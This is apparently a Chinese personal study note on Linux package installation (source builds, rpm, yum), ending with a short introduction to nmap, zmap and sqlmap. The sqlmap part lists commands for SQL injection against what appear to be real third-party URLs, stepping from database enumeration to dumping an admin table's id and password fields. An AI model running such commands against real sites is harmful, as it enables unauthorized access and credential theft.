环境部署安装2020.06.17

环境部署安装:

三种不同的安装方式(推荐使用yum当没有网络时推荐使用rpm或者源码安装
Ubuntu中使用apt也可)

一.Linux源码安装

1、解压源码包文件

源码包通常会使用tar工具归档然后使用gunzip或bzip2进行压缩，后缀格式会分别为.tar.gz与.tar.bz2，分别的解压方式：

tar -zxvf FileName.tar.gz

tar -jxvf FileName.tar.bz2

\

    tar 对文件进行压缩或解压 tar [参数] [文件]

        -c 压缩文件

        -x 解压文件

        -t 查看压缩包内有哪些文件

        -z 用Gzip压缩或解压

        -j 用bzip2压缩或解压

        -v 显示压缩或解压过程信息

        -f 目标文件名

        -P 保留原始权限和属性

        -p 使用绝对路径压缩

        -C 指定解压到的目录

\

2、切换到解压后的目录

cd FileDirectory

\

3、准备编译工作

在开始安装服务之前，需要执行configure脚本，会自动的对当前系统进行一系列的评估，如源文件、软件依赖库、编译器、

汇编器、连接器检查等等，如果有需要，还可以使用-prefix参数来指定程序的安装路径，而当脚本检查系统环境符合要求后，

则会在当前目录下生成一个Makefile文件。

./configure -prefix=/usr/local/program

\

4、生成安装程序

上步生成的Makefile文件会保存有系统环境依赖关系的安装规则，接下来需要使用make命令来根据Makefile文件提供

的规则使用合适的SHELL来编译所有依赖的源码，然后make命令会生成一个最终可执行的安装程序。

make

\

5、安装服务程序

如果在configure脚本阶段中没有使用-prefix参数，那么程序一般会被默认安装到/usr/local/bin目录中。

make install



6、清理临时文件（可选）：

make clean

\

7、卸载服务程序命令（需要才执行）

make uninstall

\

8、查看安装信息

    whereis

命令定位可执行文件、源代码文件、帮助文件在文件系统中的位置。这些文件的属性应属于原始代码，二进制文件，或是帮助文件。

    whereis [-bmsu] [BMS 目录名 -f ] 文件名

    -b 搜索文件的二进制部分。

    -m 搜索文件的手册部分。

    -s 搜索文件的源部分。

    -u 没有说明文档的文件

    -B、-M 和 -S 标志可以用于更改或限制 whereis

命令搜索的位置。由于该程序为了运行得更快而使用了 chdir 子例程，所以用
-M、-S 和 -B 标志目录列表给出的路径名必须是完整的；例如，它们必须以一个
/ （斜杠）开始。

    -B 与 -b 一样，但是添加了要搜索的目录。更改或限制 whereis

命令搜索二进制文件的位置。

    -M 与 -m 一样，但是添加了要搜索的目录。更改或限定 whereis

命令搜索手册部分的位置。

    -S 与 -s 一样，但是添加了要搜索的目录。更改或限定 whereis

命令搜索源的位置。

    -f 终止最后的 -M、-S 或 -B 目录列表并发文件名起始位置信号。

\

源码包安装会比RPM包安装慢，是因为RPM的软件包是根据特定系统和平台而指定的，经常一种程序会提供很多RPM包

的格式，用户根据系统情况选择适合的RPM包直接安装，而源码包相当于通用型，可以是用于多个系统中，所以需要

运行configure脚本来检测环境，生成对应的安装信息。

二：RPM包安装

rpm [选项] [参数]

-a：查询所有软件包

-e：删除指定的软件包

-f\<文件\>：查询拥有指定文件的套件；

-h或--hash：显示进度信息

-i：显示包的详细信息

-i\<软件包\>或--install\<软件包\>：安装指定的软件包

-l：显示包的文件列表

-p：查询指定的RPM包

-q：使用询问模式

-U\<软件包\>或--upgrade\<软件包\>：升级指定的程序包

-v：显示指令执行过程；

-vv：详细显示指令执行过程，便于排错。

\

常用命令组合：

－ivh：安装显示安装进度--install--verbose--hash

－Uvh：升级软件包--Update；

－qpl： 列出RPM软件包内的文件信息[Query Package list]；

－qpi：列出RPM软件包的描述信息[Query Package install package(s)]；

－qf：查找指定文件属于哪个RPM软件包[Query File]；

－Va：校验所有的 RPM软件包，查找丢失的文件[View Lost]；

－e：删除包

--force 强制操作 如强制删除等；

--requires 显示该包的依赖关系；

--nodeps 忽略依赖关系并继续操作



1、安装

rpm -i 需要安装的包文件

rpm -iv    需要安装的包文件（显示安装详情）

rpm -ivh 需要安装的包文件（显示安装详情及进度）

\

2、升级

rpm -U 需要升级的包文件

rpm -Uvh 需要升级的包文件（显示升级详情及进度）

\

3、卸载

rpm -e 需要卸载的软件包

注：如果其他程序依赖要卸载的包，系统会提示不能删除，若需要强行删除加上–nodeps，会强制删除，但可能导致

依赖于它的软件不能运行。



4、查看已安装

    rpm -qa



5、查看指定包

    rpm -qa | grep "软件或者包的名字"

\

三、yum安装

1、安装

    yum install 软件

\

2、升级

    yum update 软件

\

3、删除

    yum remove 软件



4、查看

    yum info 软件



5、搜索软件

    yum search 软件

\

6、查看依赖关系

    yum deplist 软件



7、查看已安装软件

    yum list installded



yum 命令参数列表：

    -e 静默执行

-t 忽略错误

-R[分钟] 设置等待时间

-y 自动应答yes

–skip-broken 忽略依赖问题

–nogpgcheck 忽略GPG验证

\

    check-update 检查可更新的包

clean all 清除全部

clean packages 清除临时包文件（/var/cache/yum 下文件）

clean headers 清除rpm头文件

clean oldheaders 清除旧的rpm头文件

deplist 列出包的依赖

list 可安装和可更新的RPM包

list installed 已安装的包

list extras 已安装且不在资源库的包

info 可安装和可更新的RPM包 信息

info installed 已安装包的信息(-qa 参数相似)

install[RPM包] 安装包

localinstall 安装本地的 RPM包

update[RPM包] 更新包

upgrade 升级系统

search[关键词] 搜索包

provides[关键词] 搜索特定包文件名

reinstall[RPM包] 重新安装包

repolist 显示资源库的配置

resolvedep 指定依赖

remove[RPM包] 卸载包

\

sqlmap与nmap与zmap的使用与安装

一、Nmap的安装：

nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称
fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap
也是不少黑客及骇客（又称脚本小子）爱用的工具
。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器，但是黑客会利用nmap来搜集目标电脑的网络设定，从而计划攻击的方法。

\

Nmap 常被跟评估系统漏洞软件混为一谈。Nmap
以隐秘的手法，避开闯入检测系统的监视，并尽可能不影响目标系统的日常操作。（来源百度百科）

nmap的详细使用方法:

1.-sL(列表描述)

该命令仅仅列出指定网络上的每台主机的，不会向目标主机发送任何报文。端口扫描、操作系统探测或者ping扫描，在该命令下不会被执行。

当主机存活时:

2.-sP(Ping扫描) {style=“margin: 20px 0px; padding: 0px; font-size: 21px; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);”}

该选项告诉Nmap仅仅 进行ping扫描
(主机发现)，然后打印出对扫描做出响应的那些主机。

选项在默认情况下， 发送一个ICMP回声请求和一个TCP报文到80端口。

3.-P0(无ping) {style=“margin: 20px 0px; padding: 0px; font-size: 21px; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);”}

用-P0选项会使Nmap对每一个指定的目标IP地址进行所要求的扫描。所以如果在命令行指定一个B类目标地址空间(/16)，
所有 65,536个IP地址都会被扫描。

剩余详情参考(
https://www.cnblogs.com/justn0w/articles/10177612.html)

\

zmap使用笔记

zmap, 一个网络端口开放性的快速扫描工具。(
https://blog.csdn.net/zahuopuboss/article/details/53244281)

\

sqlmap

sqlmap是一个非常强大的sql注入检测与辅助工具，但是由于没有图形界面，基本上用起来比较麻烦。我们要了解这些语句。如下：

检查注入点：

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

爆所有数据库信息：

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

爆当前数据库信息：

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --current-db

指定库名列出所有表

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id＝11 -D vhost48330 --tables# ‘vhost48330’ 为指定数据库名称

指定库名表名列出所有字段

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id＝11 -D vhost48330 -T admin --columns# ‘admin’ 为指定表名称

指定库名表名字段dump出指定字段

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id＝11 -D vhost48330 -T admin -C ac，id，password --dump# ‘ac,id,password’ 为指定字段名称

\

目标地址：http://www.any.com/wcms/show.php?id=33

具体实操推荐(
https://blog.csdn.net/w1304099880/article/details/102759432)

\

\

高级软件管理器

https://www.cnblogs.com/dreamtrue13/p/6693533.html